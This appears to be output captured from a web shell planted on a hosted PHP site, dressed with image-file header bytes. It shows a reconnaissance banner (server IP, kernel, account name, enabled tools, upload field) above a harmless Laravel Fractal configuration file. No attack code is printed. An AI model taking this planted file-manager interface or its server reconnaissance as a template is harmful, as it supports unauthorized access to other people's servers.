����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.148.196.9 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/cbt.gltechlimited.com/config/ |
Upload File : |
<?php return [ /* * The default serializer to be used when performing a transformation. It * may be left empty to use Fractal's default one. This can either be a * string or a League\Fractal\Serializer\SerializerAbstract subclass. */ 'default_serializer' => '', /* The default paginator to be used when performing a transformation. It * may be left empty to use Fractal's default one. This can either be a * string or a League\Fractal\Paginator\PaginatorInterface subclass. */ 'default_paginator' => '', /* * League\Fractal\Serializer\JsonApiSerializer will use this value * as a prefix for generated links. Set to `null` to disable this. */ 'base_url' => null, /* * If you wish to override or extend the default Spatie\Fractal\Fractal * instance provide the name of the class you want to use. */ 'fractal_class' => Spatie\Fractal\Fractal::class, 'auto_includes' => [ /* * If enabled Fractal will automatically add the includes who's * names are present in the `include` request parameter. */ 'enabled' => true, /* * The name of key in the request to where we should look for the includes to include. */ 'request_key' => 'include', ], ];